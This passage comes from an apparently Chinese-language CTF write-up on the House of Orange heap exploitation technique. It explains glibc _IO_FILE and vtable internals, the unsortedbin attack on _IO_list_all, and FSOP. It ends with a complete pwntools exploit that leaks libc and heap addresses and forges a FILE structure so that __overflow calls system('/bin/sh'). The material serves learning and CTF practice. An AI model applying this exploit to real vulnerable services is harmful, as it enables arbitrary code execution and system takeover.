<p>整个结构不用完全掌握，大概了解就行。<br>在进程中的产生的各个<code>_IO_FILE</code>结构会通过其中的<code>struct _IO_FILE *_chain;</code>连接在一起<strong>形成一个链表</strong>，其中<strong>表头</strong>使用全局变量<code>struct _IO_FILE_plus *_IO_list_all</code>来表示，通过<code>_IO_list_all</code>就可以遍历所有<code>_IO_FILE</code>结构。</p>
<p><strong>_IO_jump_t *vtable</strong>结构定义如下:<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> _<span class="title">IO_jump_t</span></span></span><br><span class="line"><span class="class">&#123;</span></span><br><span class="line">    JUMP_FIELD(<span class="keyword">size_t</span>, __dummy);</span><br><span class="line">    JUMP_FIELD(<span class="keyword">size_t</span>, __dummy2);</span><br><span class="line">    JUMP_FIELD(_IO_finish_t, __finish);</span><br><span class="line">    JUMP_FIELD(_IO_overflow_t, __overflow);</span><br><span class="line">    JUMP_FIELD(_IO_underflow_t, __underflow);</span><br><span class="line">    JUMP_FIELD(_IO_underflow_t, __uflow);</span><br><span class="line">    JUMP_FIELD(_IO_pbackfail_t, __pbackfail);</span><br><span class="line">    <span class="comment">/* showmany */</span></span><br><span class="line">    JUMP_FIELD(_IO_xsputn_t, __xsputn);</span><br><span class="line">    JUMP_FIELD(_IO_xsgetn_t, __xsgetn);</span><br><span class="line">    JUMP_FIELD(_IO_seekoff_t, __seekoff);</span><br><span class="line">    JUMP_FIELD(_IO_seekpos_t, __seekpos);</span><br><span class="line">    JUMP_FIELD(_IO_setbuf_t, __setbuf);</span><br><span class="line">    JUMP_FIELD(_IO_sync_t, __sync);</span><br><span class="line">    JUMP_FIELD(_IO_doallocate_t, __doallocate);</span><br><span class="line">    JUMP_FIELD(_IO_read_t, __read);</span><br><span class="line">    JUMP_FIELD(_IO_write_t, __write);</span><br><span class="line">    JUMP_FIELD(_IO_seek_t, __seek);</span><br><span class="line">    JUMP_FIELD(_IO_close_t, __close);</span><br><span class="line">    JUMP_FIELD(_IO_stat_t, __stat);</span><br><span class="line">    JUMP_FIELD(_IO_showmanyc_t, __showmanyc);</span><br><span class="line">    JUMP_FIELD(_IO_imbue_t, __imbue);</span><br><span class="line"><span class="meta">#<span class="meta-keyword">if</span> 0</span></span><br><span class="line">    get_column;</span><br><span class="line">    set_column;</span><br><span class="line"><span class="meta">#<span class="meta-keyword">endif</span></span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure></p>
<p>这里面保存了一系列的函数指针。</p>
<p>以上，主要需要了解的就是 <strong>_IO_FILE_plus</strong>、<strong>_IO_FILE</strong>、<strong>vtable</strong>3个结构以及 <strong>_IO_list_all指针</strong>的关系和及其内容。</p>
<p><strong>[注]</strong>在gdb中查看这些结构的指令:<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//查看_IO_list_all指针</span></span><br><span class="line">p *_IO_list_all</span><br><span class="line"><span class="comment">//查看_IO_FILE_plus</span></span><br><span class="line">p (*(struct _IO_FILE_plus *) <span class="number">0x55cdf66034f0</span>)</span><br><span class="line"><span class="comment">//查看vtable</span></span><br><span class="line">p (*(struct _IO_jump_t *) <span class="number">0x55cdf66034f0</span>)</span><br></pre></td></tr></table></figure></p>
<h2 id="unsortedbin-attack"><a href="#unsortedbin-attack" class="headerlink" title="unsortedbin attack"></a>unsortedbin attack</h2><p>根据house of orange的流程，接下来将要控制<code>_IO_list_all</code>指针的值，具体原因后面会讲到。这里我们采用<strong>unsortedbin attack</strong>来对它的值进行修改。</p>
<h3 id="原理-1"><a href="#原理-1" class="headerlink" title="原理"></a>原理</h3><p>在从unsorted bin中取出chunk时，会执行以下代码：<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">    bck = victim-&gt;bk;</span><br><span class="line">    ...</span><br><span class="line"><span class="comment">/* remove from unsorted list */</span></span><br><span class="line">    unsorted_chunks(av)-&gt;bk = bck;</span><br><span class="line">    bck-&gt;fd                 = unsorted_chunks(av);</span><br></pre></td></tr></table></figure></p>
<p>这里将最后一个chunk取出，并把倒数第二个chunk的<code>fd</code>设置为<code>unsorted_chunks(av)</code>，这里<code>unsorted_chunks(av)</code>就是main_arena中top成员变量的地址(&amp;main_arena+88)。<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//main_arena的结构</span></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">malloc_state</span></span></span><br><span class="line"><span class="class">&#123;</span></span><br><span class="line">  <span class="keyword">mutex_t</span> mutex;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">int</span> flags;</span><br><span class="line"></span><br><span class="line">  mfastbinptr fastbinsY[NFASTBINS];</span><br><span class="line"></span><br><span class="line">  mchunkptr top;    <span class="comment">//此处的地址将被写入目标地址</span></span><br><span class="line"></span><br><span class="line">  mchunkptr last_remainder;</span><br><span class="line"></span><br><span class="line">  ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>可以发现，如果我们将victim的<code>bk</code>改写为某个地址，则可以向<code>这个地址 + 0x10</code>的地方写入<code>&amp;main_arena+88</code>。<br>因为题目程序中存在堆溢出，所以可以轻松溢出到某个chunk的<code>bk</code>，并将它改写。这里我们写入<code>_IO_list_all - 0x10</code>，这样当从unsorted bin中取出它时，就可以成功将<code>_IO_list_all</code>写为<code>&amp;main_arena+88</code>。</p>
<p>具体利用过程需要和后面FSOP配合。</p>
<h2 id="FSOP"><a href="#FSOP" class="headerlink" title="FSOP"></a>FSOP</h2><h3 id="漏洞原理"><a href="#漏洞原理" class="headerlink" title="漏洞原理"></a>漏洞原理</h3><blockquote>
<p>因为<code>_IO_FILE</code>结构使用链表的结构管理，表头由<code>_IO_list_all</code>维护。所以FSOP的核心思想就是<strong>劫持_IO_list_all的值</strong>并伪造链表和其中的<code>_IO_FILE</code></p>
</blockquote>
<p>在此之前，我们先了解一下<code>malloc</code>对错误信息的处理过程.</p>
<ol>
<li><p>在<code>malloc</code>出错时，会调用<code>malloc_printerr</code>函数来输出错误信息</p>
 <figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (__builtin_expect (victim-&gt;size &lt;= <span class="number">2</span> * SIZE_SZ, <span class="number">0</span>)|| __builtin_expect (victim-&gt;size &gt; av-&gt;system_mem, <span class="number">0</span>))</span><br><span class="line">    malloc_printerr (check_action, <span class="string">"malloc(): memory corruption"</span>, chunk2mem (victim), av);</span><br></pre></td></tr></table></figure>
</li>
<li><p>而<code>malloc_printerr</code>又会调用<code>__libc_message</code>;</p>
</li>
<li><code>__libc_message</code>又调用<code>abort</code>;</li>
<li><code>abort</code>则又调用了<code>_IO_flush_all_lockp</code></li>
<li>最后<code>_IO_flush_all_lockp</code>中会调用到<code>vtable</code>中的<code>_IO_OVERFLOW</code>函数</li>
</ol>
<p>整个流程如下图：<br><img src="/post/f8f8701e/abort_routine.jpeg" alt="流程图"><br>所以如果可以控制<code>_IO_list_all</code>的值，同时够伪造一个<code>_IO_FILE</code>及其<code>vtable</code>并放入FILE链表中，就可以让上述流程进入我们伪造的<code>vtable</code>, 并调用被修改为<code>system</code>的<code>_IO_OVERFLOW</code>函数。</p>
<p>但是想要成功调用<code>_IO_OVERFLOW</code>函数还需要绕过一些阻碍<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">int</span> _IO_flush_all_lockp (<span class="keyword">int</span> do_lock)</span><br><span class="line">&#123;</span><br><span class="line">  ...</span><br><span class="line">  fp = (_IO_FILE *) _IO_list_all;</span><br><span class="line">  <span class="keyword">while</span> (fp != <span class="literal">NULL</span>)</span><br><span class="line">  &#123;</span><br><span class="line">       ...</span><br><span class="line">        <span class="keyword">if</span> (((fp-&gt;_mode &lt;= <span class="number">0</span> &amp;&amp; fp-&gt;_IO_write_ptr &gt; fp-&gt;_IO_write_base)</span><br><span class="line">#<span class="keyword">if</span> defined _LIBC || defined _GLIBCPP_USE_WCHAR_T</span><br><span class="line">        || (_IO_vtable_offset (fp) == <span class="number">0</span></span><br><span class="line">        &amp;&amp; fp-&gt;_mode &gt; <span class="number">0</span> &amp;&amp; (fp-&gt;_wide_data-&gt;_IO_write_ptr</span><br><span class="line">                    &gt; fp-&gt;_wide_data-&gt;_IO_write_base))</span><br><span class="line">#endif</span><br><span class="line">        ) &amp;&amp; _IO_OVERFLOW (fp, EOF) == EOF)</span><br><span class="line">        ...</span><br><span class="line">        ...</span><br><span class="line">        fp = fp-&gt;_chain;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>观察代码发现，<code>_IO_OVERFLOW</code>存在于<code>if</code>之中，根据短路原理，若要执行到<code>_IO_OVERFLOW</code>，就需要让前面的判断都能满足，即：<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">fp-&gt;_mode &lt;= <span class="number">0</span> </span><br><span class="line">&amp;&amp; fp-&gt;_IO_write_ptr &gt; fp-&gt;_IO_write_base</span><br></pre></td></tr></table></figure></p>
<p>或者<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">_IO_vtable_offset (fp) == <span class="number">0</span></span><br><span class="line">&amp;&amp; fp-&gt;_mode &gt; <span class="number">0</span> </span><br><span class="line">&amp;&amp; (fp-&gt;_wide_data-&gt;_IO_write_ptr &gt; fp-&gt;_wide_data-&gt;_IO_write_base）</span><br></pre></td></tr></table></figure></p>
<p>以上两个条件至少要满足一个，这里我们将选择第一个，只需要构造<code>mode</code>、<code>_IO_write_ptr</code>和<code>_IO_write_base</code>。因为这些都是我们可以伪造的<code>_IO_FILE</code>中的数据，所以比较容易实现。</p>
<h3 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h3><p>在前面已经介绍过，可以通过unsortedbin attack来将<code>_IO_list_all</code>指针的值修改为<code>&amp;main_arena+88</code>。</p>
<p>但这还不够，因为我们很难控制<code>main_arena</code>中的数据，并不能在<code>mode</code>、<code>_IO_write_ptr</code>和<code>_IO_write_base</code>的对应偏移处构造出合适的值。</p>
<p>所以我们将目光转向<code>_IO_FILE</code>的链表特性。在前文<code>_IO_flush_all_lockp</code>函数的代码最后，可以发现程序通过<code>fp = fp-&gt;_chain</code>不断的寻找下一个<code>_IO_FILE</code>。</p>
<p>所以如果可以修改<code>fp-&gt;_chain</code>到一个我们伪造好的<code>_IO_FILE</code>的地址，那么就可以成功实现利用了。</p>
<p>巧妙的是，<code>_IO_FILE</code>结构中的<code>chian</code>字段对应偏移是0x68，而在<code>&amp;main_arena+88</code>对应偏移为0x68的地址正好是大小为0x60的<code>small bin</code>的bk，而这个地址的刚好是我们可以控制的。<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">+<span class="number">0x00</span> [       top        |  last_remainder   ]</span><br><span class="line">+<span class="number">0x10</span> [ unsorted bin fd  |  unsorted bin bk  ]</span><br><span class="line">+<span class="number">0x20</span> [ smallbin <span class="number">0x20</span> fd | smallbin <span class="number">0x20</span> bk  ]</span><br><span class="line">+<span class="number">0x30</span> [ smallbin <span class="number">0x30</span> fd | smallbin <span class="number">0x30</span> bk  ]</span><br><span class="line">+<span class="number">0x40</span> [ smallbin <span class="number">0x40</span> fd | smallbin <span class="number">0x40</span> bk  ]</span><br><span class="line">+<span class="number">0x50</span> [ smallbin <span class="number">0x50</span> fd | smallbin <span class="number">0x50</span> bk  ]</span><br><span class="line">+<span class="number">0x60</span> [ smallbin <span class="number">0x60</span> fd | smallbin <span class="number">0x60</span> bk  ]</span><br><span class="line"></span><br><span class="line">pwndbg&gt; x/<span class="number">64</span>gx _IO_list_all</span><br><span class="line"><span class="number">0x7fdd7442c7b8</span> &lt;main_arena+<span class="number">88</span>&gt;:	<span class="number">0x00005616d200b010</span>	<span class="number">0x00005616d1fe94f0</span></span><br><span class="line"><span class="number">0x7fdd7442c7c8</span> &lt;main_arena+<span class="number">104</span>&gt;:	<span class="number">0x00005616d1fe94f0</span>	<span class="number">0x00007fdd7442d190</span></span><br><span class="line"><span class="number">0x7fdd7442c7d8</span> &lt;main_arena+<span class="number">120</span>&gt;:	<span class="number">0x00007fdd7442c7c8</span>	<span class="number">0x00007fdd7442c7c8</span></span><br><span class="line"><span class="number">0x7fdd7442c7e8</span> &lt;main_arena+<span class="number">136</span>&gt;:	<span class="number">0x00007fdd7442c7d8</span>	<span class="number">0x00007fdd7442c7d8</span></span><br><span class="line"><span class="number">0x7fdd7442c7f8</span> &lt;main_arena+<span class="number">152</span>&gt;:	<span class="number">0x00007fdd7442c7e8</span>	<span class="number">0x00007fdd7442c7e8</span></span><br><span class="line"><span class="number">0x7fdd7442c808</span> &lt;main_arena+<span class="number">168</span>&gt;:	<span class="number">0x00007fdd7442c7f8</span>	<span class="number">0x00007fdd7442c7f8</span></span><br><span class="line"><span class="number">0x7fdd7442c818</span> &lt;main_arena+<span class="number">184</span>&gt;:	<span class="number">0x00005616d1fe94f0</span>	<span class="number">0x00005616d1fe94f0</span> &lt;== 此处</span><br><span class="line"><span class="number">0x7fdd7442c828</span> &lt;main_arena+<span class="number">200</span>&gt;:	<span class="number">0x00007fdd7442c818</span>	<span class="number">0x00007fdd7442c818</span></span><br></pre></td></tr></table></figure></p>
<p>我们如果通过溢出，将位于unsorted bin中的chunk的<code>size</code>修改为0x60。（注：现在unsorted bin中的chunk就是之前被释放的top chunk的一部分）<br>那么在下一次malloc的时候，因为在其他bin中都没有合适的chunk，malloc将会进入<code>大循环</code>，<strong>把unsorted bin中的chunk放回到对应的small bin或large bin中</strong>（具体流程参考<a href="https://ctf-wiki.github.io/ctf-wiki/pwn/linux/heap/heap_implementation_details/#_7" target="_blank" rel="noopener">ctfwiki</a>）<br>因此，我们修改过size的chunk就会被放入大小为0x60的<code>small bin</code>中，同时，该<code>small bin</code>的fd和bk都会变为此chunk的地址。</p>
<p>这样，当<code>_IO_flush_all_lockp</code>函数通过<code>fp-&gt;_chain</code>寻找下一个<code>_IO_FILE</code>时，就会寻找到<code>smallbin 0x60</code>中的chunk。<br>只要在这个chunk中伪造好<code>_IO_FILE</code>结构体以及<code>vtable</code>，把<code>_IO_OVERFLOW</code>设置为<code>system</code>，然后就可以成功getshell了。</p>
<h3 id="利用过程-1"><a href="#利用过程-1" class="headerlink" title="利用过程"></a>利用过程</h3><p>直接构造payload</p>
<ol>
<li><p>首先是padding，抵达被释放掉的top chunk。</p>
 <figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload = <span class="string">'a'</span> * <span class="number">0x400</span> + p64(<span class="number">0</span>) + p64(<span class="number">0x21</span>) + p32(<span class="number">1</span>) + p32(<span class="number">0x1f</span>) + p64(<span class="number">0</span>)</span><br></pre></td></tr></table></figure>
</li>
<li><blockquote>
<p>接下来构造的内存具有双重身份，一是作为伪造的<code>_IO_FILE</code>；一是用于<code>unsorted  attack</code>的victim chunk，因为它位于unsorted bin中。</p>
</blockquote>
<p> 然后开始构造<code>_IO_FILE</code>。因为要调用的<code>_IO_OVERFLOW (fp, EOF)</code>被修改后为<code>system(fp)</code>，所以在开头写入<code>&#39;/bin/sh\x00&#39;</code>，让<code>fp = &quot;/bin/sh&quot;</code>；又因为为了将这个chunk放入<code>smallbin 0x60</code>，所以将<code>size</code>位设置为0x61。</p>
 <figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">fake_file = <span class="string">'/bin/sh\x00'</span> + p64(<span class="number">0x61</span>)</span><br></pre></td></tr></table></figure>
</li>
<li><p>然后将<code>bk</code>的位置写入<code>(IO_list_all - 0x10</code>，用作<code>unsorted  attack</code></p>
 <figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">fake_file += p64(<span class="number">0</span>) + p64(IO_list_all - <span class="number">0x10</span>)</span><br></pre></td></tr></table></figure>
</li>
<li><p>接下来的位置刚好是<code>_IO_write_base</code>和<code>IO_write_ptr</code>。前面提到过需要构造<code>fp-&gt;_IO_write_ptr &gt; fp-&gt;_IO_write_base</code></p>
 <figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">fake_file += p64(<span class="number">0</span>) + p64(<span class="number">1</span>)    <span class="comment">#_IO_write_base ; _IO_write_ptr</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>接下来需要一段padding，直至<code>fp-&gt;mode</code></p>
 <figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">fake_file = fake_file.ljust(<span class="number">0xc0</span>, <span class="string">'\x00'</span>)   <span class="comment">#padding</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>抵达<code>fp-&gt;mode</code>，构造<code>fp-&gt;_mode &lt;= 0</code></p>
 <figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">fake_file += p64(<span class="number">0</span>) <span class="comment">#mode &lt;= 0</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>然后需要设置<code>vtable</code>指针，将它设置到当前地址相邻往后的地址，然后继续在后面构造<code>vtable</code>就行了</p>
 <figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">payload += fake_file</span><br><span class="line">payload += p64(<span class="number">0</span>) + p64(<span class="number">0</span>)  <span class="comment">#padding</span></span><br><span class="line">payload += p64(heap_addr + <span class="number">0x5d0</span>)   <span class="comment">#vtable指针</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>构造<code>vtable</code></p>
 <figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">payload += p64(<span class="number">0</span>)*<span class="number">3</span> <span class="comment">#vtable</span></span><br><span class="line">payload += p64(system)  <span class="comment">#将__overflow改为system</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>写入数据</p>
 <figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">upgrade(<span class="number">0x800</span>, payload)</span><br></pre></td></tr></table></figure>
</li>
<li><p>触发漏洞</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">p.recvuntil(<span class="string">'Your choice : '</span>)</span><br><span class="line">p.sendline(<span class="string">'1'</span>)</span><br></pre></td></tr></table></figure>
<p>调用<code>build</code>函数，由最初的分析可知，此处会申请3个chunk。</p>
<ul>
<li>申请第一个chunk时，大小为0x20，因为<code>fastbin</code>中没有chunk，所以会进入大循环，将我们前面构造好的chunk放入<code>smallbin 0x60</code>。</li>
<li>在从<code>unsorted bin</code>中取出这个chunk时，又会触发<code>unsortedbin attack</code>，改写<code>_IO_list_all</code>指针。至此，所有数据都布置好了。</li>
<li>因为<code>unsortedbin attack</code>的时候破坏了<code>unsorted bin</code>的链表结构，所以接下来的分配过程会出现错误，系统调用<code>malloc_printerr</code>去打印错误信息，从而被我们劫持流程，执行到<code>system</code>函数。</li>
</ul>
</li>
</ol>
<h1 id="EXP"><a href="#EXP" class="headerlink" title="EXP"></a>EXP</h1><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#-*- coding:utf-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.terminal = [<span class="string">'gnome-terminal'</span>, <span class="string">'-x'</span>, <span class="string">'bash'</span>, <span class="string">'-c'</span>]</span><br><span class="line"></span><br><span class="line">p = process(<span class="string">'./house_of_orange'</span>)</span><br><span class="line">elf = ELF(<span class="string">'./house_of_orange'</span>)</span><br><span class="line">libc = ELF(<span class="string">'/lib/x86_64-linux-gnu/libc.so.6'</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">build</span><span class="params">(size, name)</span>:</span></span><br><span class="line">    p.recvuntil(<span class="string">'Your choice : '</span>)</span><br><span class="line">    p.sendline(<span class="string">'1'</span>)</span><br><span class="line">    p.recvuntil(<span class="string">'Length of name :'</span>)</span><br><span class="line">    p.sendline(str(size))</span><br><span class="line">    p.recvuntil(<span class="string">'Name :'</span>)</span><br><span class="line">    p.send(name)</span><br><span class="line">    p.recvuntil(<span class="string">'Price of Orange:'</span>)</span><br><span class="line">    p.sendline(<span class="string">'8'</span>)</span><br><span class="line">    p.recvuntil(<span class="string">'Color of Orange:'</span>)</span><br><span class="line">    p.sendline(<span class="string">'1'</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">see</span><span class="params">()</span>:</span></span><br><span class="line">    p.recvuntil(<span class="string">'Your choice : '</span>)</span><br><span class="line">    p.sendline(<span class="string">'2'</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">upgrade</span><span class="params">(size, name)</span>:</span></span><br><span class="line">    p.recvuntil(<span class="string">'Your choice : '</span>)</span><br><span class="line">    p.sendline(<span class="string">'3'</span>)</span><br><span class="line">    p.recvuntil(<span class="string">'Length of name :'</span>)</span><br><span class="line">    p.sendline(str(size))</span><br><span class="line">    p.recvuntil(<span class="string">'Name:'</span>)</span><br><span class="line">    p.send(name)</span><br><span class="line">    p.recvuntil(<span class="string">'Price of Orange: '</span>)</span><br><span class="line">    p.sendline(<span class="string">'8'</span>)</span><br><span class="line">    p.recvuntil(<span class="string">'Color of Orange: '</span>)</span><br><span class="line">    p.sendline(<span class="string">'1'</span>)</span><br><span class="line"></span><br><span class="line">build(<span class="number">0x10</span>, <span class="string">'aaaa'</span>)</span><br><span class="line">payload = <span class="string">'a'</span>*<span class="number">0x18</span> + p64(<span class="number">0x21</span>) + p64(<span class="number">0</span>)*<span class="number">3</span> + p64(<span class="number">0xfa1</span>)</span><br><span class="line">upgrade(<span class="number">0x100</span>, payload)</span><br><span class="line"><span class="comment">#将topchunk放入unsortedbin</span></span><br><span class="line">build(<span class="number">0x1000</span>, <span class="string">'aaaa'</span>)</span><br><span class="line"><span class="comment">#从unsortedbin中取出一部分topchunk</span></span><br><span class="line">build(<span class="number">0x400</span>, <span class="string">'a'</span>*<span class="number">0x8</span>)</span><br><span class="line">see()</span><br><span class="line">p.recvuntil(<span class="string">'aaaaaaaa'</span>)</span><br><span class="line">libc_base = u64(p.recvline()[:<span class="number">-1</span>].ljust(<span class="number">8</span>, <span class="string">'\x00'</span>)) - <span class="number">0x3C2DC8</span></span><br><span class="line"><span class="keyword">print</span> <span class="string">"libc_base : %#x"</span> % libc_base </span><br><span class="line">upgrade(<span class="number">0x400</span>, <span class="string">'a'</span>*<span class="number">0x10</span>)</span><br><span class="line">see()</span><br><span class="line">p.recvuntil(<span class="string">'a'</span>*<span class="number">0x10</span>)</span><br><span class="line">heap_addr = u64(p.recvline()[:<span class="number">-1</span>].ljust(<span class="number">8</span>, <span class="string">'\x00'</span>)) - <span class="number">0xc0</span></span><br><span class="line"><span class="keyword">print</span> <span class="string">"heap_addr : %#x"</span> % heap_addr</span><br><span class="line"></span><br><span class="line">system = libc_base + libc.symbols[<span class="string">'system'</span>]</span><br><span class="line">IO_list_all = libc_base + libc.symbols[<span class="string">'_IO_list_all'</span>]</span><br><span class="line"><span class="keyword">print</span> <span class="string">"system : %#x"</span> % system</span><br><span class="line"><span class="keyword">print</span> <span class="string">"_IO_list_all : %#x"</span> % IO_list_all</span><br><span class="line"></span><br><span class="line">payload = <span class="string">'a'</span> * <span class="number">0x400</span>   <span class="comment">#padding</span></span><br><span class="line">payload += p64(<span class="number">0</span>) + p64(<span class="number">0x21</span>)   <span class="comment">#padding</span></span><br><span class="line">payload += p32(<span class="number">1</span>) + p32(<span class="number">0x1f</span>) + p64(<span class="number">0</span>)  <span class="comment">#padding</span></span><br><span class="line"></span><br><span class="line">fake_file = <span class="string">'/bin/sh\x00'</span> + p64(<span class="number">0x61</span>)   <span class="comment"># fp; size</span></span><br><span class="line">fake_file += p64(<span class="number">0</span>) + p64(IO_list_all - <span class="number">0x10</span>)   <span class="comment"># fd; bk</span></span><br><span class="line">fake_file += p64(<span class="number">0</span>) + p64(<span class="number">1</span>)    <span class="comment"># _IO_write_base ; _IO_write_ptr</span></span><br><span class="line">fake_file = fake_file.ljust(<span class="number">0xc0</span>, <span class="string">'\x00'</span>)   <span class="comment">#padding</span></span><br><span class="line">fake_file += p64(<span class="number">0</span>) <span class="comment"># mode &lt;= 0</span></span><br><span class="line"></span><br><span class="line">payload += fake_file</span><br><span class="line">payload += p64(<span class="number">0</span>) + p64(<span class="number">0</span>)  <span class="comment">#padding</span></span><br><span class="line">payload += p64(heap_addr + <span class="number">0x5d0</span>)   <span class="comment">#vtable指针</span></span><br><span class="line"></span><br><span class="line">payload += p64(<span class="number">0</span>)*<span class="number">3</span> <span class="comment"># vtable</span></span><br><span class="line">payload += p64(system)  <span class="comment"># 将__overflow改为system</span></span><br><span class="line"></span><br><span class="line">upgrade(<span class="number">0x800</span>, payload)</span><br><span class="line"></span><br><span class="line">gdb.attach(p)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">'Your choice : '</span>)</span><br><span class="line">p.sendline(<span class="string">'1'</span>)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
